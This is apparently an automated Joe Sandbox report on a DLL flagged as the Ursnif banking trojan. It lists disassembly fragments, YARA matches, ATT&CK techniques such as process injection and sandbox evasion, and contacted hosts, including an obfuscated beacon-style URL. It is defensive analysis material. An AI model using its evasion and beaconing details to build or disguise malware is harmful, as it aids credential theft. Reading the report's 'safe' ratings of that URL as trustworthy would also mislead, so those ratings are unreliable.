Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00512170 push ecx; ret	1_2_00512179
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00D9AEDB push ecx; ret	1_2_00D9AEEB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00D9AB20 push ecx; ret	1_2_00D9AB29
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004F0066 push dword ptr [ebp-000000D8h]; ret	1_2_004F009B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004F0005 push dword ptr [ebp-000000D8h]; ret	1_2_004F0065
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004F009C push dword ptr [ebp-000000D8h]; ret	1_2_004F0252
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004F009C push dword ptr [ebp-000000E0h]; ret	1_2_004F029C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004F009C push dword ptr [esp+10h]; ret	1_2_004F03AB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004F03AC push dword ptr [esp+0Ch]; ret	1_2_004F03BF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004F03AC push dword ptr [esp+10h]; ret	1_2_004F0404

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.385630027.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.601348245.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385676545.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385708605.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385696789.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385602285.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385720393.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385552815.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385580205.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1872, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5832	Thread sleep count: 177 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5832	Thread sleep time: -88500s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe

1_2_00D9523B

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004F0476 mov eax, dword ptr fs:[00000030h]	1_2_004F0476
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004F009C mov eax, dword ptr fs:[00000030h]	1_2_004F009C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004F03AC mov eax, dword ptr fs:[00000030h]	1_2_004F03AC

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe			Jump to behavior

Source: regsvr32.exe, 00000001.00000002.601014756.0000000002E20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000001.00000002.601014756.0000000002E20000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: regsvr32.exe, 00000001.00000002.601014756.0000000002E20000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: regsvr32.exe, 00000001.00000002.601014756.0000000002E20000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00D965CE cpuid

1_2_00D965CE

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00511006 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

1_2_00511006

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00D965CE RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

1_2_00D965CE

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_005110D8 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_005110D8

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.385630027.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.601348245.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385676545.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385708605.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385696789.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385602285.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385720393.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385552815.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385580205.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1872, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.385630027.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.601348245.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385676545.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385708605.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385696789.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385602285.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385720393.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385552815.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385580205.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1872, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	DLL Side-Loading1	Process Injection12	Masquerading1	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Account Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Regsvr321	LSA Secrets	System Owner/User Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
c0nnect1on.dll	20%	Virustotal	Browse
c0nnect1on.dll	10%	ReversingLabs
c0nnect1on.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.regsvr32.exe.510000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen8		Download File
1.2.regsvr32.exe.d90000.3.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

Source	Detection	Scanner	Link
tls13.taboola.map.fastly.net	0%	Virustotal	Browse
ocsp.sca1b.amazontrust.com	0%	Virustotal	Browse
edge.gycpi.b.yahoodns.net	0%	Virustotal	Browse
img.img-taboola.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://ocsp.sca1b.amazontrust.com/images/EaRh3KPU8Z7coy/kY49BSPFz6LoeX84d6Nmk/tmvkFayWIoRWEt0L/B4ps7khO_2F9SEG/f9boHEnizBFmGTNyDb/Kge3D9NUI/7_2Fw5RP2M_2BeX2COQk/s_2FybxZe2CPpDEkVp2/8ynz_2BTLv3U3kmn5mpdiz/j3XtWX.avi	0%	Avira URL Cloud	safe
https://www.remixd.com/privacy_policy.html	0%	Avira URL Cloud	safe
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&utm_campaign=shop-gross	0%	Avira URL Cloud	safe
https://bealion.com/politica-de-cookies	0%	Avira URL Cloud	safe
https://www.gadsme.com/privacy-policy/	0%	Avira URL Cloud	safe
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	0%	Avira URL Cloud	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	0%	URL Reputation	safe
https://www.blackfridaydeals.ch/?utm_source=ms&utm_campaign=topnav	0%	Avira URL Cloud	safe
https://channelpilot.co.uk/privacy-policy	0%	Avira URL Cloud	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
https://www.admo.tv/en/privacy-policy	0%	Avira URL Cloud	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	0%	URL Reputation	safe
https://www.blackfridaydeals.ch/?utm_source=ms&utm_campaign=mestripe	0%	Avira URL Cloud	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://www.bidstack.com/privacy-policy/	0%	URL Reputation	safe
https://listonic.com/privacy/	0%	Avira URL Cloud	safe
https://quantyoo.de/datenschutz	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&utm_campaign=shop-trends	0%	Avira URL Cloud	safe
https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
contextual.media.net	104.84.56.24	true	false		high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	0%, Virustotal, Browse	unknown
ocsp.sca1b.amazontrust.com	13.224.89.96	true	false	0%, Virustotal, Browse	unknown
hblg.media.net	104.84.56.24	true	false		high
lg3.media.net	104.84.56.24	true	false		high
edge.gycpi.b.yahoodns.net	87.248.118.22	true	false	0%, Virustotal, Browse	unknown
s.yimg.com	unknown	unknown	false		high
web.vortex.data.msn.com	unknown	unknown	false		high
www.msn.com	unknown	unknown	false		high
srtb.msn.com	unknown	unknown	false		high
img.img-taboola.com	unknown	unknown	false	0%, Virustotal, Browse	unknown
cvision.media.net	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ocsp.sca1b.amazontrust.com/images/EaRh3KPU8Z7coy/kY49BSPFz6LoeX84d6Nmk/tmvkFayWIoRWEt0L/B4ps7khO_2F9SEG/f9boHEnizBFmGTNyDb/Kge3D9NUI/7_2Fw5RP2M_2BeX2COQk/s_2FybxZe2CPpDEkVp2/8ynz_2BTLv3U3kmn5mpdiz/j3XtWX.avi	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://searchads.msn.net/.cfm?&&kp=1&	~DF61CB16FB817E4404.TMP.3.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.4.dr	false		high
https://www.remixd.com/privacy_policy.html	iab2Data[1].json.4.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com;Fotos	85-0f8009-68ddb2ab[1].js.4.dr	false	Avira URL Cloud: safe	low
https://srtb.msn.com:443/notify/viewedg?rid=a16315818c9f4b41b00a4c8209d92d24&r=infopane&i=3&	auction[1].htm.4.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.4.dr	false		high
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/f%c3%bcr-immer-fr%c3%b6hlich-pessimistisch/ar-BB1bcZ3l?ocid=hpl	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/dieser-weisse-spatz-lebt-wohl-weniger-lang-als-seine-artgenosse	de-ch[1].htm.4.dr	false		high
https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1	auction[1].htm.4.dr	false		high
https://outlook.live.com/mail/deeplink/compose;Kalender	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	~DF61CB16FB817E4404.TMP.3.dr	false		high
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.4.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://web.vortex.data.msn.com/collect/v1	de-ch[1].htm.4.dr	false		high
https://www.office.com/?omkt=de-ch%26WT.mc_id=MSN_site	de-ch[1].htm.4.dr	false		high
https://www.skype.com/	de-ch[1].htm.4.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	auction[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&utm_campaign=shop-gross	de-ch[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.4.dr	false		high
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://amzn.to/2TTxhNg	de-ch[1].htm.4.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://client-s.gateway.messenger.live.com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.brightcom.com/privacy-policy/	iab2Data[1].json.4.dr	false		high
https://www.msn.com/de-ch/	de-ch[1].htm.4.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	~DF61CB16FB817E4404.TMP.3.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river	de-ch[1].htm.4.dr	false		high
https://bealion.com/politica-de-cookies	iab2Data[1].json.4.dr	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch	de-ch[1].htm.4.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-verticals-shoppinghub	de-ch[1].htm.4.dr	false		high
https://twitter.com/i/notifications;Ich	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa	de-ch[1].htm.4.dr	false		high
https://www.gadsme.com/privacy-policy/	iab2Data[1].json.4.dr	false	Avira URL Cloud: safe	unknown
https://portal.eu.numbereight.me/policies-license#software-privacy-notice	iab2Data[1].json.4.dr	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/der-fc-z%c3%bcrich-punktet-weiter-doch-etwas-fehlt/ar-BB1bfNaZ?	de-ch[1].htm.4.dr	false		high
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.4.dr	false		high
http://ogp.me/ns#	de-ch[1].htm.4.dr	false		high
https://docs.prebid.org/privacy.html	iab2Data[1].json.4.dr	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.skype.com/de	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&es=Q9naAlEGIS.1JJYPdMI_yhrAE6dOAkiyv1mspKhU5S1V	auction[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/19-j%c3%a4hriger-lernfahrer-stirbt-nach-unfall-mit-t%c3%b6ff/ar	de-ch[1].htm.4.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.4.dr	false		high
https://www.skype.com/de/download-skype	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.4.dr	false		high
https://www.blackfridaydeals.ch/?utm_source=ms&utm_campaign=topnav	de-ch[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://channelpilot.co.uk/privacy-policy	iab2Data[1].json.4.dr	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/news/other/sind-die-badis-in-z%c3%bcrich-bald-gratis-f%c3%bcr-alle/ar-BB1b	de-ch[1].htm.4.dr	false		high
https://onedrive.live.com;OneDrive-App	85-0f8009-68ddb2ab[1].js.4.dr	false	Avira URL Cloud: safe	low
https://www.msn.com/de-ch/news/other/ein-markantes-warenhaus-beim-z%c3%bcrcher-bellevue-erh%c3%a4lt-	de-ch[1].htm.4.dr	false		high
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.admo.tv/en/privacy-policy	iab2Data[1].json.4.dr	false	Avira URL Cloud: safe	unknown
https://policies.oath.com/us/en/oath/privacy/index.html	auction[1].htm.4.dr	false		high
https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath	iab2Data[1].json.4.dr	false		high
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://outlook.com/	de-ch[1].htm.4.dr	false		high
https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862	de-ch[1].htm.4.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	~DF61CB16FB817E4404.TMP.3.dr	false		high
https://cdn.cookielaw.org/vendorlist/iabData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"	de-ch[1].htm.4.dr	false		high
https://cdn.cookielaw.org/vendorlist/iab2Data.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	false		high
https://onedrive.live.com/?qt=mru;Aktuelle	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"	auction[1].htm.4.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	~DF61CB16FB817E4404.TMP.3.dr	false		high
https://www.msn.com/de-ch/homepage/api/modules/fetch"	de-ch[1].htm.4.dr	false		high
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	de-ch[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.blackfridaydeals.ch/?utm_source=ms&utm_campaign=mestripe	de-ch[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a	de-ch[1].htm.4.dr	false		high
https://www.bidstack.com/privacy-policy/	iab2Data[1].json.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/en/download/	85-0f8009-68ddb2ab[1].js.4.dr	false		high
http://popup.taboola.com/german	auction[1].htm.4.dr	false		high
https://listonic.com/privacy/	iab2Data[1].json.4.dr	false	Avira URL Cloud: safe	unknown
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d	de-ch[1].htm.4.dr	false		high
https://www.msn.com/de-ch/news/other/gesundheitsdirektorin-natalie-rickli-zu-den-problemen-am-z%c3%b	de-ch[1].htm.4.dr	false		high
https://twitter.com/	de-ch[1].htm.4.dr	false		high
https://quantyoo.de/datenschutz	iab2Data[1].json.4.dr	false	Avira URL Cloud: safe	unknown
https://outlook.live.com/calendar	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	auction[1].htm.4.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&utm_campaign=shop-trends	de-ch[1].htm.4.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/#qt=mru	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap	auction[1].htm.4.dr	false		high
https://www.msn.com?form=MY01O4&OCID=MY01O4	de-ch[1].htm.4.dr	false		high
https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf	iab2Data[1].json.4.dr	false	Avira URL Cloud: safe	unknown
https://support.skype.com	85-0f8009-68ddb2ab[1].js.4.dr	false		high
https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=	de-ch[1].htm.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1	~DF61CB16FB817E4404.TMP.3.dr	false		high
https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656	de-ch[1].htm.4.dr	false		high
https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&es=mNNGG.8GIS8bXOIK1_6XOep5pccJpAwYCgwLRODglrB_LQvU	auction[1].htm.4.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
87.248.118.22	unknown	United Kingdom	203220	YAHOO-DEBDE	false
13.224.89.96	unknown	United States	16509	AMAZON-02US	false
151.101.1.44	unknown	United States	54113	FASTLYUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321561
Start date:	23.11.2020
Start time:	10:00:16
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	c0nnect1on.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.bank.troj.winDLL@13/133@10/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 51% (good quality ratio 48.2%) Quality average: 78.8% Quality standard deviation: 28.7%
HCA Information:	Successful, ratio: 73% Number of executed functions: 34 Number of non-executed functions: 44
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
